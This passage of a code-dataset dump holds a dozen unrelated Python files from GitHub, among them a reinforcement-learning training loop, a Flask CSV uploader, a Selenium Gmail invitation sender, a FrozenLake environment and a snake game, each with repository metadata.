range(n_epochs):\n loss_epoch=0\n for b in range(total_batches):\n index=b*batch_size\n batch_x=train_x[index:index+batch_size]\n batch_lab=train_lab[index:index+batch_size]\n batch={'batch_x':batch_x,'labels':batch_lab}\n loss_step, pred_lab =self.model.update(batch)\n loss_epoch+=loss_step\n loss_epoch=loss_epoch/total_batches\n loss[epoch]=loss_epoch\n\n #pylab.figure()\n #pylab.plot(loss)\n #pylab.xlabel('Epochs')\n #pylab.ylabel('Loss')\n #pylab.title('Average Loss')\n #pylab.savefig('Results/TrainingLoss.jpg')\n #pylab.show()\n\n \n \n def train_error(self):\n n_epochs=self.parameters['n_epochs']\n batch_size=self.parameters['batch_size']\n n_iter=self.parameters['n_iter']\n frac_epochs=self.parameters['frac_epochs']\n #frac_epochs=(n_epochs-1)/n_VI\n\n\n # Create the dataset (n_iter x hor x dimension of d_set) and the labels (n_iter x hor)\n data=self.env.extract_d_set()\n labels=self.env.extract_sources_influence()\n #build the network\n self.model = model(self.parameters)\n \n data=np.array(data)\n labels=np.array(labels)\n\n #Select train_test_split of the experience as train set and the rest as test set\n indexes=np.arange(len(data))\n #np.random.shuffle(indexes)\n indexes_train=indexes[:int(self.parameters['train_test_split']*n_iter)]\n indexes_test=indexes[int(self.parameters['train_test_split']*n_iter):]\n train_x = data[indexes_train]\n train_lab = labels[indexes_train]\n test_x = data[indexes_test]\n test_lab = labels[indexes_test]\n \n total_batches = len(train_x) // batch_size\n loss = np.zeros(n_epochs)\n loss_1=np.zeros([n_epochs,2])\n\n CE=[]\n N1=[]\n V=[]\n \n\n #Build the exact influence IALM where to evaluate the performances of the approximate-influence optimal policy\n #Exact_IALM=IALM(self.parameters,Exact_I)\n \n for epoch in range(n_epochs):\n loss_epoch=0\n loss_epoch_1=np.array([0,0])\n\n #Compute the approximate influence given the current state of the network\n #Approx_I is a len=hor list. 
dim(Approx_I[t])=dim(d_set_t) x dim(sources_influence)\n if epoch%frac_epochs==0:\n # if epoch==n_epochs-1:\n # verb=1\n # else:\n # verb=0\n #len(Approx_I)=hor np.shape(Approx_I[t])= n_dsets[t] x n_inf_sourse(2) x n_values_inf_sources(2) \n Approx_I=self.approximate_influence()\n\n #Build the approximat influence IALM\n IALM_traffic=IALM(self.parameters, Approx_I)\n\n #Compute the Approx_I optimal policy\n Pi=IALM_traffic.value_iteration()\n\n #Compute the value of the Approx_I optimal policy in the Exact_I IALM\n V.append(IALM_traffic.evaluate_IALM_policy(1000, Pi, self.policies[1:]))\n \n #Evaluate the performances of the network\n cross_entropy, norm_1=self.model.evaluate(test_x,test_lab)\n\n CE.append(cross_entropy)\n N1.append(norm_1)\n\n #Training step\n for b in range(total_batches):\n index=b*batch_size\n batch_x=train_x[index:index+batch_size]\n batch_lab=train_lab[index:index+batch_size]\n batch={'batch_x':batch_x,'labels':batch_lab}\n loss_step, loss_1_step, pred_lab =self.model.update(batch)\n loss_epoch_1=loss_1_step+loss_epoch_1\n loss_epoch+=loss_step\n\n loss_1[epoch]=loss_epoch_1/total_batches\n \n loss_epoch=loss_epoch/total_batches\n loss[epoch]=loss_epoch\n\n '''\n pylab.figure()\n pylab.plot(loss)\n pylab.xlabel('Epochs')\n pylab.ylabel('Loss')\n pylab.title('Average Loss')\n pylab.savefig('Results/TrainingLoss.jpg')\n #pylab.show()\n\n pylab.figure()\n pylab.plot(loss_1[:,0])\n pylab.xlabel('Epochs')\n pylab.ylabel('Loss')\n pylab.title('Average Loss east')\n pylab.savefig('Results/TrainingLoss.jpg')\n\n pylab.figure()\n pylab.plot(loss_1[:,1])\n pylab.xlabel('Epochs')\n pylab.ylabel('Loss')\n pylab.title('Average Loss north')\n pylab.savefig('Results/TrainingLoss.jpg')\n pylab.show()\n '''\n return N1, CE, V, loss\n\n\n def generate_d_set(self):\n\n D=np.zeros([4**self.parameters['hor'],self.parameters['hor'],2])\n for i in range(4**self.parameters['hor']):\n D_set = \"{0:b}\".format(i)\n D_set = np.array([int(j) for j in D_set])\n while(len(D_set)<2*self.parameters['hor']):\n D_set=np.insert(D_set,0,0,axis=0)\n D_set=np.reshape(D_set,[self.parameters['hor'],2])\n D[i]=D_set\n\n return D\n\n def approximate_influence(self):\n \t#Compute the approximate_influence for any D_set\n I=[]\n influences=self.model.predictions(self.D)\n #print('around[0,1]',influences[198][0][0])\n\n for t in np.arange(self.parameters['hor']-1,-1, step=-1):\n n_dsets=4**(t+1)\n rev_index=self.parameters['hor']-t-1\n I.append(np.zeros((n_dsets,2,2)))\n indexes=np.arange(0,4**self.parameters['hor'], step=4**rev_index)\n\n I[rev_index]=influences[indexes,t]\n \n I.reverse()\n return I\n \n\n\n\n","repo_name":"INFLUENCEorg/Approx-IBA-Planning","sub_path":"environments/TrafficGrid/experimentor.py","file_name":"experimentor.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14633136281","text":"#!/usr/bin/env python\nfrom math import *\nfrom od_utils import *\nfrom od_model import *\n\ndef force_creation(i, pb1, pb2, r1, r2, stiffness=None):\n\t###create forces\n\tangle = pi/180.0*i*60.0\n\tposition1 = [cos(angle)*r1, 0.0, sin(angle)*r1 ]\n\tposition2 = [cos(angle)*r2, 0.0, sin(angle)*r2 ]\n\ti_mar = od_marker(\"imarker_\"+str(i))\n\ti_mar.set(\"Position\", position1)\n\tpb1.adding(i_mar)\n\tj_mar = od_marker(\"jmarker_\"+str(i))\n\tj_mar.set(\"Position\", position2)\n\tpb2.adding(j_mar)\n\tspdp = od_spdpt(\"spdp\"+str(i))\n\tspdp.set_imarker(i_mar, pb1)\n\tspdp.set_jmarker(j_mar, pb2)\n\tif 
stiffness is None: stiffness = 10.0\n\tspdp.set(\"Stiffness\", stiffness)\n\tspdp.set(\"Damping\", 0.0)\n\tspdp.set(\"Distance\", 2.0)\n\treturn spdp\n\t\n\t\ndef model_create():\n\t###this function is to create a model with a plate supported by 6 SPDPs###\n\t\t\t#create plate \n\t\t\tmodel = Od_model()\n\t\t\tmodel.add_ground()\n\t\t\tground = model.ground()\n\t\t\tplate = od_body(\"platform\")\n\t\t\tplate.set(\"Position\", [0.0, 1.0, 0])\n\t\t\tplate.set(\"Ref_Orientation\", [0.0, 90.0, 0.0])\n\t\t\tmodel.adding(plate)\n\t\t\t#disc\n\t\t\tplate.adding(od_cylinder(1.0, 1.0, .1))\n\t\t\tfor i in range(6):\n\t\t\t\t force = force_creation(i, plate, ground, 1.0, 2.0, 1000.0)\n\t\t\t\t model.adding(force)\n\t\t\treturn model\n\t\t\t\t\nif __name__ == \"__main__\":\n    _model = model_create()\n    setModel(_model)\t\t\t\n\n\t\t\t\n","repo_name":"utbeaver/obdyn_old","sub_path":"wb/plate_6force.py","file_name":"plate_6force.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17455182876","text":"class CGLibPy_Arc(object):\n    centrePt = None\n    startPt = None\n    endPt = None\n    radius = 0.0\n    startAng = 0.0\n    endAng = 0.0\n    sweepAng = 0.0\n    fullCircle = False\n    CCW = True
\n\n    def __init__(self,*args):\n        if len(args) == 3: #Circle - Centre, radius, Orientation\n            self.centrePt = args[0]\n            self.radius = args[1]\n            self.CCW = args[2]\n            self.fullCircle = True\n        elif len(args) == 5: #Arc - Centre, Start Pt, End Pt, radius, Orientation\n            self.centrePt = args[0]\n            self.startPt = args[1]\n            self.endPt = args[2]\n            self.radius = args[3]\n            self.CCW = args[4]\n\n    def translateBy(self,dx,dy,dz):\n        if self.startPt is not None and self.endPt is not None:\n            self.startPt.translateBy(dx,dy,dz)\n            self.endPt.translateBy(dx,dy,dz)\n            self.centrePt.translateBy(dx,dy,dz)\n\n    def transformBy(self,transF):\n        if self.startPt is not None and self.endPt is not None:\n            self.startPt.transformBy(transF)\n            self.endPt.transformBy(transF)\n            self.centrePt.transformBy(transF)\n    \n","repo_name":"rhtbapat/CGLibPy","sub_path":"CGLibPy/CGLibPy_Arc.py","file_name":"CGLibPy_Arc.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5728822024","text":"from fractions import Fraction\ndef chkPrime(a):\n    for i in range(2, int(a ** 0.5) + 1):\n        if a % i == 0:\n            return 0\n    return 1\ndef solution(a, b):\n    answer = 1\n    tmp = Fraction(a, b).denominator\n    tmpst = set()\n    for i in range(2, tmp + 1):\n        if tmp % i == 0 and chkPrime(i) == 1:\n            tmpst.add(i)\n    if len(tmpst) > 2:\n        answer = 2\n    elif len(tmpst) == 2:\n        if 2 not in tmpst or 5 not in tmpst:\n            answer = 2\n    elif len(tmpst) == 1:\n        if 2 not in tmpst and 5 not in tmpst:\n            answer = 2\n    return answer","repo_name":"lynever/prac_programmars","sub_path":"프로그래머스/lv0/120878. 
유한소수 판별하기/유한소수 판별하기.py","file_name":"유한소수 판별하기.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1187171217","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\n\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n 'file:/uscms/home/shalhout/no_backup/patTuple_testing.root'\n )\n)\n\n#process.demo = cms.EDAnalyzer('ElectronTestAnalysis'\n#)\n\n\nprocess.demo = cms.EDAnalyzer('TestTriggerAna',\nelectronSrc = cms.untracked.InputTag(\"cleanPatElectrons\"),\nmuonSrc = cms.untracked.InputTag(\"cleanPatMuons\"),\ntauSrc = cms.untracked.InputTag(\"cleanPatTaus\"),\ntriggerEventSrc = cms.untracked.InputTag(\"patTriggerEvent\"),\neTrigMatchEle20Src = cms.untracked.string(\"eTrigMatchEle20\"),\neTrigMatchEle22Src = cms.untracked.string(\"eTrigMatchEle22\"),\neTrigMatchEle27Src = cms.untracked.string(\"eTrigMatchEle27\"),\nmuTrigMatchMu17Src = cms.untracked.string(\"muTrigMatchMu17\"),\nmuTrigMatchMu18Src = cms.untracked.string(\"muTrigMatchMu18\"),\nmuTrigMatchMu24Src = cms.untracked.string(\"muTrigMatchMu24\"),\ntauTrigMatchMu17Src = cms.untracked.string(\"tauTrigMatchMu17\"),\ntauTrigMatchMu18Src = cms.untracked.string(\"tauTrigMatchMu18\"),\ntauTrigMatchMu24Src = cms.untracked.string(\"tauTrigMatchMu24\"),\ntauTrigMatchEle20Src = cms.untracked.string(\"tauTrigMatchEle20\"),\ntauTrigMatchEle22Src = cms.untracked.string(\"tauTrigMatchEle22\"),\ntauTrigMatchEle27Src = cms.untracked.string(\"tauTrigMatchEle27\"),\n\n )\n\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"sshalhou/DemoTauCode","sub_path":"UserCode/TestTriggerAna/testtriggerana_cfg.py","file_name":"testtriggerana_cfg.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38753516241","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=invalid-name\n\"utils for inspecting objects and frames\"\nfrom typing import Dict, Any\nfrom collections import ChainMap\nfrom .inspection import diffobj\n\n\nclass ConfigObject:\n \"\"\"\n Object with a few helper function for comparison\n \"\"\"\n def __eq__(self, other):\n return isinstance(other, self.__class__) and self.__dict__ == other.__dict__\n\n def __init_subclass__(cls, hashattributes = (), **_):\n if hashattributes:\n def __hash__(self):\n return hash((self.__class__, *(getattr(self, i, '?') for i in hashattributes)))\n cls.__hash__ = __hash__\n return super().__init_subclass__(**_)\n\n def diff(self, other) -> Dict[str, Any]:\n \"return the diff with `other`\"\n return diffobj(self, other)\n\n def config(self, tpe = dict):\n \"return a chainmap with default and updated values\"\n fcn = getattr(self, '__getstate__', None)\n # pylint: disable=not-callable\n dself = fcn() if callable(fcn) else dict(self.__dict__)\n if tpe in (dict, 'dict'):\n return dself\n\n if all(hasattr(self.__class__, i) for i in dself):\n other = {i: getattr(self.__class__, i) for i in dself}\n else:\n # don't create a new instance unless necessary\n other = self.__class__().config(dict)\n return ChainMap(diffobj(dself, other), other)\n\ndef bind(ctrl, master, slave):\n \"\"\"\n 
bind to main tasks model\n \"\"\"\n if isinstance(master, str):\n master = ctrl.model(master)\n\n if isinstance(slave, str):\n slave = ctrl.model(slave)\n\n if master is not slave:\n ctrl.observe(master, lambda **_: ctrl.update(slave, **slave.diff(master)))\n","repo_name":"depixusgenome/libanalysis","sub_path":"utils/configobject.py","file_name":"configobject.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5784491452","text":"class GameUI:\n def __init__(self, game_service):\n self.__game_service = game_service\n\n def __print_board(self):\n print(self.__game_service.get_board_for_printing())\n\n def __move_snake(self, command):\n if len(command) == 2:\n try:\n command_count = int(command[1])\n except ValueError:\n raise ValueError(\"Invalid number of steps! It is not an integer!\")\n if command_count < 1:\n raise ValueError(\"Invalid number of steps! It is not a strictly positive integer!\")\n for i in range(command_count):\n game_over = self.__game_service.move_snake()\n if game_over:\n return True\n return False\n elif len(command) == 1:\n return self.__game_service.move_snake()\n else:\n raise ValueError(\"Invalid number of parameters for the move command!\")\n\n def __turn(self, command_word):\n return self.__game_service.turn(command_word)\n\n def play_game(self):\n self.__game_service.set_up()\n game_done = False\n while not game_done:\n try:\n self.__print_board()\n command = input(\"Give a command: \")\n command = command.split()\n if len(command) > 0:\n command_word = command[0]\n if command_word == \"move\":\n game_done = self.__move_snake(command)\n elif len(command) == 1 and command_word in [\"up\", \"down\", \"left\", \"right\"]:\n game_done = self.__turn(command_word)\n else:\n raise ValueError(\"Invalid command!\")\n else:\n raise ValueError(\"Invalid command!\")\n except ValueError as ve:\n print(ve)\n print(\"Game over! 
The snake is no more!\")","repo_name":"HoriaRaduRusu/Snake","sub_path":"src/ui/gameui.py","file_name":"gameui.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7299023382","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nclass compose:\n def __init__(self,driver):\n self.driver = driver\n \n def compose_mail(self,invitation_df):\n wait = WebDriverWait(self.driver, 300)\n # iterate over invitation_df\n for index in range(len(invitation_df)):\n #click on compose button\n composeButton = wait.until(\n EC.visibility_of_element_located((By.XPATH, \"//div[contains(text(),'Compose')]\"))\n )\n composeButton.click()\n\n # enter the mail id\n toMail = wait.until(\n EC.visibility_of_element_located((By.XPATH, '//input[@class=\"agP aFw\" and @peoplekit-id=\"BbVjBd\"]'))\n )\n toMail.click()\n email_ID = invitation_df['Attendees'].iloc[index]\n toMail.send_keys(email_ID + Keys.ENTER)\n\n # enter the subject\n toSubject = self.driver.find_element(By.XPATH, '//input[@name=\"subjectbox\"]')\n subject = \"Invitation to the meeting on the topic: \" + invitation_df['Topic'].iloc[index]\n toSubject.click()\n toSubject.send_keys(subject + Keys.ENTER)\n\n # enter the body\n toBody = self.driver.find_element(By.XPATH, '//*[@aria-label=\"Message Body\" and @contenteditable=\"true\"]')\n toBody.click()\n toBody.send_keys(invitation_df['Invitation Link'].iloc[index])\n\n # send the mail\n self.driver.find_element(By.XPATH, \"//div[@class='dC']\").click()\n \n time.sleep(5)\n self.driver.close()","repo_name":"uddiGitHub/Automatic-Zoom-Meeting-Scheduler-with-Email-Integration","sub_path":"src/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13268327123","text":"# This package allows servers, requests, urls, etc.\nfrom flask import Flask, request, render_template, redirect, url_for\n# Create app var from Flask package\napp = Flask(__name__)\n\n# This packages allows for saving files to app dir\nimport os\nimport pandas as pd\n\n# Set path to upload csv (path of current app dirname)\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n# Create get route, function to run on request\n@app.route('/')\ndef home_route():\n return render_template('upload.html')\n\n# Create post & get route, function to run on request\n@app.route('/results', methods=['POST', 'GET'])\ndef send_csv():\n if request.method == 'POST':\n if request.files['file'].filename == '' or request.files['file'].filename.endswith('.csv') == False:\n return redirect(url_for(\"home_route\"))\n else:\n target = os.path.join(APP_ROOT, 'static/uploads')\n file = request.files['file']\n filename = file.filename\n destination = \"/\".join([target, filename])\n file.save(destination)\n df = pd.read_csv(destination)\n print(df)\n # df.columns = ['column_1','column_2','column_3','column_4','column_5']\n csvfinal = df\n os.remove(destination)\n csvfinal.to_csv(target + '/updated_file.csv', index=False)\n return render_template('results.html')\n else:\n return redirect(url_for(\"home_route\"))\n\n# This runs the server (provided by Flask)\nif __name__ == '__main__':\n 
app.run(debug=True)\n","repo_name":"talfers/uploadr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24719810327","text":"import numpy as np\nfrom gym import Env\n\n# MAP_SIZE = 6\n# SLIPPING_PROBABILITY = 0.94\n# BREAKING_PROBABILITY = 0.0001\nSLIPPING_PROBABILITY = 0.7\nBREAKING_PROBABILITY = 0.001\nMAP_SIZE = 15\nLEFT = 0\nDOWN = 1\nRIGHT = 2\nUP = 3\nX = 0\nY = 1
\n\ndef make_map(studentNum): \n    \"\"\"\n    Observation Space : map of environment \n    A MAP_SIZE*MAP_SIZE grid graph\n    Start point = (0,0)\n    End point = (MAP_SIZE-1,MAP_SIZE-1)\n    Just one safe path for each student number\n    The breaking probability in each state:\n    on the safe path = BREAKING_PROBABILITY, random in [0,1) for all other states\n\n    :param 1: Student number \n    \n    :return : The Created Map \n    \"\"\"\n\n    np.random.seed(studentNum) \n    move = np.zeros((MAP_SIZE-1)*2) # Minimum moves from start to the end point in a MAP_SIZE*MAP_SIZE grid graph\n    idx = np.random.choice(range((MAP_SIZE-1)*2),size=(MAP_SIZE-1),replace=False)\n    move[idx] = 1\n\n    point = [0,0]\n    lowprobs = [tuple(point)]\n\n    for m in move:\n        if m:\n            point[0] += 1\n        else:\n            point[1] += 1\n        lowprobs.append(tuple(point))\n\n    idx = np.array(lowprobs)\n    # map = np.ones((MAP_SIZE,MAP_SIZE))\n    map = np.random.random((MAP_SIZE,MAP_SIZE))\n    map[idx[:,0],idx[:,1]] = BREAKING_PROBABILITY \n    \n    map[0,0] = 0.0 # Start point\n    map[MAP_SIZE-1,MAP_SIZE-1] = 0.0 # End point\n\n    return map
\n\nclass FrozenLake(Env):\n    def __init__(self, studentNum):\n        \"\"\"\n        Add whatever parameter you need!\n\n        - Student Number\n        - action_space: All available actions the agent can perform.(LEFT = 0,DOWN = 1,RIGHT = 2,UP = 3)\n        - observation_space: Structure of the observation.(map of environment)\n\n        Don't forget to reset the environment :)\n        \"\"\"\n        self.map = make_map(studentNum)\n        self.reset()\n\n    def reset(self):\n        \"\"\"\n        Reset the state of the environment\n\n        :return: Return the initial state\n        \"\"\"\n        self.state = (0,0)\n        self.is_finished = False\n        return self.state
\n\n    def find_next_states(self, action, current_state=None):\n        if current_state is None:\n            current_state = self.state\n        states = np.array([[current_state[X],current_state[Y]-1], [current_state[X]+1,current_state[Y]], [current_state[X],current_state[Y]+1], [current_state[X]-1 ,current_state[Y]]])\n        next_states = np.minimum(np.maximum(states, [[0,0]]*4), [[(MAP_SIZE-1),(MAP_SIZE-1)]]*4)\n        next_states, counts = np.unique(next_states, axis=0, return_counts=True)\n        breaking_probability = self.map[(np.array(next_states)[:,0]),(np.array(next_states)[:,1])]\n        states_probability = counts*((1-SLIPPING_PROBABILITY)/3)\n        states_probability[next_states.tolist().index((np.minimum(np.maximum(states[action], [0,0]),[(MAP_SIZE-1),(MAP_SIZE-1)])).tolist())] += (SLIPPING_PROBABILITY-((1-SLIPPING_PROBABILITY)/3)) \n        is_end = [True if state == [(MAP_SIZE-1),(MAP_SIZE-1)] else False for state in next_states.tolist()]\n        return next_states, states_probability, breaking_probability, is_end\n    \n    def step(self, action): \n        \"\"\"\n        Perform an action in the environment, provide observation for the new state and provide a reward\n        \n        :param 1:selected action \n\n        :return: the next state of the env, the reward of the action, and whether the episode is finished\n        \"\"\"\n        states, states_probability, breaking_probability, is_end = self.find_next_states(action)\n        random_state = np.random.choice(np.arange(len(states)), p = states_probability)\n        is_fall = np.random.rand() < 
breaking_probability[random_state]\n reward = -1 + int(is_end[random_state])*100 + int((not is_end[random_state]) and is_fall)*(-10)\n self.is_finished = is_end[random_state] or is_fall\n self.state = tuple(states[random_state])\n return self.state, reward, self.is_finished\n \n\n def render(self):\n \"\"\"\n (Optional)\n Render the environment for visualization.\n \n :param 1 = instant state \n\n :return: map of environment\n \"\"\"\n environment_map = \"\"\n for i in range(MAP_SIZE):\n environment_map += (\"\\n\"+ int(9.33*MAP_SIZE)*\"-\" + \"\\n| \")\n for j in range(MAP_SIZE):\n if (i,j) == (0,0):\n environment_map += \"\\033[44m{:.4f}\\033[0m | \".format(self.map[i,j])\n elif (i,j) == (MAP_SIZE-1,MAP_SIZE-1):\n environment_map += \"\\033[42m{:.4f}\\033[0m | \".format(self.map[i,j])\n elif self.map[i,j] == BREAKING_PROBABILITY:\n environment_map += \"\\033[43m{:.4f}\\033[0m | \".format(self.map[i,j])\n else :\n environment_map += \"{:.4f} | \".format(self.map[i,j]) \n environment_map += (\"\\n\" + int(9.33*MAP_SIZE)*\"-\")\n print(environment_map) \n\n def close(self): \n \"\"\"\n (Optional) : Perform cleanup\n\n \"\"\"","repo_name":"mohammadsaadati80/Frozen-Lake-PI-VI","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7632540276","text":"#sys libs\n#include libs\nimport sys\nsys.path.insert(0, '..')\nfrom include import *\n\nfile = \"../../evaluations/source known.csv\"\n\nstudy_id = 9\n\nquery_id = 0\n\nscrapers_id = 0\n\nsearch_engine = \"Import\"\n\nresults_position = 0\n\nresults_import = 1\n\njob_id = 0\n\ntoday = date.today()\n\ntimestamp = datetime.now()\n\n\n\nwith open(file, 'r') as csvfile:\n csv_result = csv.reader(csvfile, delimiter=',', quotechar='\"')\n source = list(csv_result)\n\nfor url in source:\n\n url = url[0]\n\n check_url = Results.getURL(query_id, study_id, url, search_engine)\n if (not check_url):\n\n url_meta = Results.getResultMeta(url)\n hash = url_meta[0]\n ip = url_meta[1]\n main = url_meta[2]\n main_hash = Helpers.computeMD5hash(main)\n contact_url = \"0\"\n contact_hash = \"0\"\n contact_url = \"0\"\n\n Results.insertResult(query_id, study_id, job_id, results_import, ip, hash, main_hash, contact_hash, search_engine, url, main, contact_url, today, timestamp, 1, results_position)\n\n check_sources = Results.getSource(hash)\n if not check_sources:\n Results.insertSource(hash, None, None, None, today, 0)\n","repo_name":"searchstudies/seoeffekt","sub_path":"apps/import/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74233660673","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport time\nfrom joblib import Parallel, delayed\n\ndef applyParallel(dfGrouped, func):\n with Parallel(n_jobs=7) as parallel:\n retLst = parallel( delayed(func)(value) for value in dfGrouped.values )\n return pd.concat(retLst, axis=0)\n \n#==============================================================================\n# 构造规则\n#==============================================================================\n\ndef train_caculate(df): \n mall_id = df[6]\n evaluate_wifi_infos = df[5]\n \n def get_shop_weight_dict(shop,evaluate_wifi_infos):\n match_wifi_info = ave_shop_wifi_infos.loc[shop]['ave_value_wifi']\n weight_count = calculate_weight(match_wifi_info,evaluate_wifi_infos)\n shop_weight1[shop] = 
weight_count \n \n match_shops = pd.Series(shop_id_mall.loc[mall_id].shop_ids)\n #策略1\n shop_weight1 = {}\n match_shops.map(lambda shop : get_shop_weight_dict(shop,evaluate_wifi_infos))\n #字典sorted排序后返回的是一个list数组\n shop_weight1 = sorted(shop_weight1.items(),key=lambda item:item[1],reverse=True)\n \n #取权重前三的所有bssid\n ####去重,并按照原来顺序排序\n temp_weight = [ele[1] for ele in shop_weight1]\n weight = list(set(temp_weight))\n weight.sort(key=temp_weight.index)\n \n tj_shop_ids = []\n if len(weight)>=3:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[2]:\n tj_shop_ids.append(ele[0])\n \n if len(weight)==2:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n if len(weight)==1:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n #若推荐的shop_id与真实的不同,修改其中一个shop_id\n shop_id = df[1]\n if shop_id not in set(tj_shop_ids):\n del tj_shop_ids[len(tj_shop_ids)-1]\n tj_shop_ids.append(shop_id)\n \n temp_df = [] \n for index,ele in enumerate(set(tj_shop_ids)):\n if index == 0:\n temp_df = pd.DataFrame({'row_id':[df[7]],'tj_shop_id':[ele]})\n else:\n temp_df = pd.concat([temp_df,pd.DataFrame({'row_id':[df[7]],'tj_shop_id':[ele]})])\n \n return temp_df\n\ndef test_caculate(df): \n mall_id = df[2]\n evaluate_wifi_infos = df[6]\n \n def get_shop_weight_dict(shop,evaluate_wifi_infos):\n match_wifi_info = ave_shop_wifi_infos.loc[shop]['ave_value_wifi']\n weight_count = calculate_weight(match_wifi_info,evaluate_wifi_infos)\n shop_weight1[shop] = weight_count \n \n match_shops = pd.Series(shop_id_mall.loc[mall_id].shop_ids)\n #策略1\n shop_weight1 = {}\n match_shops.map(lambda shop : get_shop_weight_dict(shop,evaluate_wifi_infos))\n #字典sorted排序后返回的是一个list数组\n shop_weight1 = sorted(shop_weight1.items(),key=lambda item:item[1],reverse=True)\n \n #取权重前三的所有bssid\n ####去重,并按照原来顺序排序\n temp_weight = [ele[1] for ele in shop_weight1]\n weight = list(set(temp_weight))\n weight.sort(key=temp_weight.index)\n \n tj_shop_ids = []\n if len(weight)>=3:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[2]:\n tj_shop_ids.append(ele[0])\n \n if len(weight)==2:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n if len(weight)==1:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n temp_df = [] \n for index,ele in enumerate(set(tj_shop_ids)):\n if index == 0:\n temp_df = pd.DataFrame({'row_id':[df[0]],'tj_shop_id':[ele]})\n else:\n temp_df = pd.concat([temp_df,pd.DataFrame({'row_id':[df[0]],'tj_shop_id':[ele]})])\n \n return temp_df\n\n#==============================================================================\n# 根据match_wifi_info和evaluate_wifi_infos进行计算一个店铺的加权数\n#==============================================================================\n\ndef calculate_weight(match_wifi_info,evaluate_wifi_infos):\n weight_count = 0 \n wifi = sorted([wifi.split('|') for wifi in evaluate_wifi_infos.split(';')],key=lambda x:int(x[1]),reverse=True)\n for wifi_info in wifi:\n bssid,rss = wifi_info[0],wifi_info[1] \n if bssid in match_wifi_info: \n #策略1\n if 
abs(int(rss)-int(match_wifi_info.get(bssid)))'2017-08-28 23:50')]\n test = pd.merge(user_shop_hehavior,shop_info[['shop_id','mall_id']],on='shop_id',how='left')\n test['row_id'] = range(len(test))\n pre_test = applyParallel(test,train_caculate)\n \n#==============================================================================\n# pre_test = pd.DataFrame({'row_id':[0],'shop_id':[0],'weight':[0],'shop_ids':[0]})\n# for line in test.values:\n# pre_test = pd.concat([pre_test,train_caculate(line)])\n# print('********')\n#==============================================================================\n \n pre_test = pd.merge(pre_test,test,on='row_id',how='left')\n pre_test['label'] = (pre_test['shop_id']==pre_test['tj_shop_id']).astype(int)\n print('正负样本比例 : ',pre_test['label'].value_counts(),'耗时: ',time.time()-t0)\n pre_test.to_csv('./data/rec_shop_id_801_831.csv',index=False)\n \n#==============================================================================\n# pre_test.to_csv('./data/rec_shop_id_822_824.csv',index=False)\n# pre_test = applyParallel(evaluation_data,test_caculate)\n# pre_test = pd.merge(pre_test,evaluation_data,on = 'row_id',how = 'left')\n# pre_test.to_csv('./data/rec_shop_id_901_915.csv',index=False)\n#==============================================================================\n print('耗时: ',time.time()-t0)\n ","repo_name":"LDongning/Shop-Position","sub_path":"tuijian.py","file_name":"tuijian.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33442312868","text":"#!/usr/bin/env python3\n\nimport argparse, os, re\n\nparser = 